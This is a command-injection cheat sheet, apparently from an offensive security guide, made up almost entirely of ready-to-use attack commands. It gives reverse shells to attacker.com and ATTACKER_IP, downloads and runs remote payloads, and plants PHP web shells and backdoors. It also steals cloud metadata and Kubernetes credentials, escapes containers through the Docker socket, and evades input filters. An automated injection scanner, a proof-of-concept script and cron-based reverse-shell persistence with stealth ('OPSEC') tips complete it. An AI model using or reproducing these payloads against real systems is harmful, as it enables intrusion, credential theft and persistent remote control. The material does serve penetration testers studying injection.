; powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# OPSEC: Fileless PowerShell (avoid disk artifacts)
; powershell -nop -w hidden -enc <BASE64_ENCODED_PAYLOAD>
# Container escape techniques (Docker/Kubernetes 2025)
# Check if running in container
; cat /proc/1/cgroup | grep docker
| cat /proc/self/mountinfo | grep docker
& hostname | grep -E '[a-f0-9]{12}' # Docker container hostnames
# Mount host filesystem (if privileged container)
; mkdir /hostfs && mount /dev/sda1 /hostfs && ls /hostfs
| fdisk -l && mount /dev/sda1 /mnt && cat /mnt/etc/shadow
# Access Docker socket (if mounted)
; docker -H unix:///var/run/docker.sock ps
| docker -H unix:///var/run/docker.sock run -v /:/hostfs -it alpine chroot /hostfs sh
# Kubernetes service account token access
; cat /var/run/secrets/kubernetes.io/serviceaccount/token
| curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces
# Cloud metadata access (AWS/GCP/Azure)
# AWS EC2 metadata
; curl http://169.254.169.254/latest/meta-data/
| curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
& curl http://169.254.169.254/latest/user-data/
# AWS IMDSv2 (requires token)
; TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") && curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
# GCP metadata
; curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
| curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure metadata
; curl -H "Metadata: true" http://169.254.169.254/metadata/instance?api-version=2021-02-01
| curl -H "Metadata: true" http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# File upload via command injection
# Create web shell
; echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
| echo 'PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+' | base64 -d > /var/www/html/shell.php
& printf '<?php eval($_POST[x]); ?>' > /var/www/html/backdoor.php
# Download and execute remote payload
; curl http://attacker.com/shell.sh | bash
| wget -O- http://attacker.com/payload.py | python3
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# OPSEC: Use legitimate tools for download
; curl -o /tmp/update.sh https://attacker.com/legit-looking-script.sh && chmod +x /tmp/update.sh && /tmp/update.sh
| wget -q https://attacker.com/app-update -O /tmp/update && /tmp/update
# Environment variable manipulation
# Add malicious PATH entry
; export PATH=/tmp:$PATH && echo '#!/bin/bash\nwhoami' > /tmp/ls && chmod +x /tmp/ls
# Unset PATH (force absolute paths - bypass validation)
; unset PATH; /bin/id
| env -i /usr/bin/whoami
# LD_PRELOAD hijacking (if writable directory available)
; echo 'void _init() { system("/bin/bash"); }' > /tmp/evil.c && gcc -shared -fPIC -o /tmp/evil.so /tmp/evil.c && LD_PRELOAD=/tmp/evil.so /bin/true
# Process information gathering
# Comprehensive enumeration
; ps aux | grep -v grep
| netstat -tulpn
|| cat /proc/cpuinfo && cat /proc/meminfo ||
& cat /proc/version && uname -a
# Check running services
; systemctl list-units --type=service --state=running
| service --status-all
& netstat -ano | findstr LISTENING # Windows
# Find SUID binaries (privilege escalation)
; find / -perm -4000 -type f 2>/dev/null
| find / -perm -u=s -type f 2>/dev/null
# Search for credentials
; grep -r "password" /var/www/ 2>/dev/null
| find / -name "*.env" -o -name "*credentials*" 2>/dev/null
& cat /home/*/.bash_history | grep -i "pass\|user\|ssh"
### Filter Bypass Techniques
# Space bypasses (evade space filters)
${IFS} # Internal Field Separator
$IFS$9 # IFS with positional parameter
{cat,/etc/passwd} # Brace expansion
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
<cat</etc/passwd # Redirection-based spacing
X=$'cat\x20/etc/passwd';$X # Hex encoding in variable
# Examples:
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd</dev/null
X=$'cat\x20/etc/passwd';$X
# Quote bypasses (evade quote-based filters)
c'a't /etc/passwd # Single quotes
c"a"t /etc/passwd # Double quotes
c\a\t /etc/passwd # Backslash escaping
ca$@t /etc/passwd # Special parameter (empty in most contexts)
ca$1t /etc/passwd # Positional parameter (if $1 is empty)
# Keyword filtering bypasses
# If 'cat' is filtered
tac /etc/passwd # Reverse cat
less /etc/passwd
more /etc/passwd
head /etc/passwd
tail /etc/passwd
nl /etc/passwd # Number lines
od -c /etc/passwd # Octal dump
xxd /etc/passwd # Hex dump
strings /etc/passwd
grep . /etc/passwd # Print all lines
awk '{print}' /etc/passwd
sed -n 'p' /etc/passwd
while read line; do echo $line; done < /etc/passwd
# If 'etc' is filtered
cat /e*c/passwd
cat /et?/passwd
cat /etc/pass??
cat /*/*/passwd
cat $(echo /etc/passwd)
cat /e\tc/passwd
# Wildcard obfuscation
/b?n/?s /etc/passwd # /bin/ls
/u*/b*/p*thon* # /usr/bin/python
# Hex/octal encoding (bypass keyword filters)
# Hex encoding in bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | xargs cat # /etc/passwd
$(printf "\143\141\164") /etc/passwd # 'cat' in octal
$(printf "\x63\x61\x74") /etc/passwd # 'cat' in hex
# Variable manipulation
a=c;b=at;$a$b /etc/passwd
cmd=cat;$cmd /etc/passwd
c=c;a=a;t=t;$c$a$t /etc/passwd
# Reverse command construction
rev<<<'dwssap/cte/ tac' | bash # Reverses to: cat /etc/passwd
# Base64 encoding (obfuscate entire command)
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash # 'cat /etc/passwd'
echo "$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d)"
# Command substitution bypasses
;$(echo cat) /etc/passwd
;`echo cat` /etc/passwd
;$(expr cat) # If expr available
;$(printf cat)
# Encoding entire payload
; echo "cat /etc/passwd" | sh
| echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh
& echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash
# OPSEC: Case manipulation (Windows)
WhOaMi # Windows is case-insensitive
DI%R # DIR
NeTsTaT -an
# Unicode/special characters (context-dependent)
cat /etc/passwd # Contains zero-width non-joiner U+200C
cat /etc/passwd # Contains zero-width space U+200B
# Glob patterns (bypass exact string matches)
/???/c?t /???/p??s?? # /bin/cat /etc/passwd
[/]???[/]c?t [/]e??[/]??ss?[?] # Same with character classes
# Time-based command obfuscation
sleep$(expr 1 + 4) # sleep 5
sleep $((1+4)) # Arithmetic expansion
# Alternative shells (if bash is restricted)
; sh -c "cat /etc/passwd"
| dash -c "whoami"
& zsh -c "id"
|| ash -c "hostname" ||
# OPSEC: Combine multiple bypasses
; ${IFS}c${IFS}a${IFS}t${IFS}/e*c/p*s*w*d
| {ca$@t,/et?/pass??}
& echo$IFS$(echo Y2F0IC9ldGMvcGFzc3dk|base64${IFS}-d)|sh
Testing Methodology#
# Automated command injection testing (with rate limiting)
#!/bin/bash
# Usage: ./cmdi_test.sh "http://target.com/ping" "ip" "127.0.0.1"
# Sends each candidate payload (appended to the parameter's normal value) as a
# POST body field to $url, times the request, and appends a log to $output.
url="$1"
param="$2"
default_value="$3"
# Log file in the current directory, named with a timestamp.
output="cmdi_results_$(date +%Y%m%d_%H%M%S).txt"
delay=2 # OPSEC: Delay between requests
echo "[*] Testing command injection on: $url" | tee "$output"
echo "[*] Parameter: $param" | tee -a "$output"
# Phase 1: Time-based detection (least noisy)
# Every payload sleeps for 5 s; the threshold in the comparison below matches that value.
echo "[*] Phase 1: Time-based detection" | tee -a "$output"
time_payloads=(
"; sleep 5"
"| sleep 5"
"& sleep 5 &"
"\$(sleep 5)"
"\`sleep 5\`"
"|| sleep 5 ||"
"; sleep 5 || ping -n 5 127.0.0.1" # Cross-platform
)
for payload in "${time_payloads[@]}"; do
test_value="${default_value}${payload}"
echo "[*] Testing: $payload" | tee -a "$output"
# Wall-clock timing at one-second resolution (date +%s).
start_time=$(date +%s)
curl -s -X POST "$url" \
-d "${param}=${test_value}" \
-A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
--max-time 10 >/dev/null 2>&1
end_time=$(date +%s)
duration=$((end_time - start_time))
# NOTE(review): --max-time 10 lets a merely slow or hung endpoint run past 5 s, so this
# check can also fire without any injection; curl's exit status is discarded above.
if [ $duration -ge 5 ]; then
echo "[+] VULNERABLE: Time delay detected (${duration}s)" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
# Skip further testing if vulnerability confirmed
echo "[*] Vulnerability confirmed. Generating PoC..." | tee -a "$output"
# NOTE(review): the request was sent as a POST body, but this line prints it as a GET query string.
echo "[PoC] ${url}?${param}=${test_value}" | tee -a "$output"
exit 0
fi
sleep $delay # OPSEC: Rate limiting
done
# Phase 2: DNS-based detection (if time-based fails)
# attacker.com is a placeholder for a domain whose resolver logs the tester can read;
# the script itself cannot observe the lookup, hence the "check DNS logs" messages.
# (From the defender's side, such lookups appear in resolver logs as unexpected
# outbound DNS from the web server for a never-seen name.)
echo "[*] Phase 2: DNS-based detection" | tee -a "$output"
unique_id=$(date +%s)
dns_domain="cmdi-${unique_id}.attacker.com"
dns_payloads=(
"; nslookup ${dns_domain}"
"| dig ${dns_domain}"
"& nslookup ${dns_domain}"
"\$(nslookup ${dns_domain})"
"\`host ${dns_domain}\`"
)
for payload in "${dns_payloads[@]}"; do
test_value="${default_value}${payload}"
echo "[*] Testing: $payload" | tee -a "$output"
echo "[*] Check DNS logs for: ${dns_domain}" | tee -a "$output"
curl -s -X POST "$url" \
-d "${param}=${test_value}" \
-A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
--max-time 5 >/dev/null 2>&1
sleep $delay
done
echo "[*] Testing complete. Check DNS logs for confirmation." | tee -a "$output"
echo "[*] Results saved to: $output"
# Modern tool alternatives (2025)
# Commix - Automated command injection tool
commix --url="http://target.com/ping" --data="ip=127.0.0.1" --level=3 --batch
# With custom User-Agent and proxy
commix --url="http://target.com/ping" \
--data="ip=INJECT_HERE" \
--user-agent="Mozilla/5.0" \
--proxy="http://127.0.0.1:8080" \
--batch
# OPSEC: Time-based only (stealth mode)
commix --url="http://target.com/ping?ip=INJECT_HERE" \
--technique=T \
--delay=2 \
--random-agent \
--batch
# Manual PoC generation after confirmation
cat > cmdi_poc.sh << 'EOF'
#!/bin/bash
# Command Injection PoC
# Target: http://target.com/ping
# Parameter: ip
# Confirmed vulnerable payload
PAYLOAD="; whoami"
echo "[*] Executing command injection..."
response=$(curl -s -X POST "http://target.com/ping" \
-d "ip=127.0.0.1${PAYLOAD}" \
-A "Mozilla/5.0")
echo "[*] Response:"
echo "$response"
# Establish reverse shell
# Plain, unencrypted TCP via bash's /dev/tcp; ATTACKER_IP is a placeholder to fill in.
# The resulting outbound connection (presumably from the web application's own
# process) is what egress filtering and outbound-connection alerting key on.
echo "[*] Attempting reverse shell..."
REVERSE_SHELL="; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Backgrounded (&), presumably so the script does not wait on a request that never returns.
curl -s -X POST "http://target.com/ping" \
-d "ip=127.0.0.1${REVERSE_SHELL}" &
echo "[*] Reverse shell sent. Check listener on port 4444"
EOF
chmod +x cmdi_poc.sh
# Listener setup for reverse shell
nc -lvnp 4444
# OPSEC: Using encrypted channel
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
openssl s_server -quiet -key server.pem -cert server.pem -port 4444
Container Escape Exploitation#
# Detecting container environment
; cat /proc/1/cgroup | grep -E "docker|lxc|kubepods"
| cat /.dockerenv 2>/dev/null && echo "Docker detected"
& cat /proc/self/mountinfo | grep docker
# Docker socket exploitation (if accessible)
; docker -H unix:///var/run/docker.sock ps
| docker -H unix:///var/run/docker.sock images
# Create privileged container and escape
; docker -H unix:///var/run/docker.sock run -v /:/hostfs --rm -it alpine chroot /hostfs sh
| docker -H unix:///var/run/docker.sock run --privileged --pid=host -it alpine nsenter -t 1 -m -u -i -n sh
# Kubernetes service account exploitation
; SA_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
| curl -k -H "Authorization: Bearer $SA_TOKEN" https://kubernetes.default.svc/api/v1/namespaces/default/pods
# List all pods in cluster
; kubectl --token=$SA_TOKEN --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt get pods --all-namespaces
# Privileged container check (capabilities)
; capsh --print | grep cap_sys_admin
| cat /proc/self/status | grep CapEff
# Mount host filesystem (if privileged)
; mkdir /host && mount /dev/sda1 /host && cat /host/etc/shadow
| fdisk -l && mount /dev/vda1 /mnt && ls /mnt
# OPSEC: Persistence in container
; echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" >> /etc/crontab
| echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' > /tmp/.hidden && chmod +x /tmp/.hidden && /tmp/.hidden &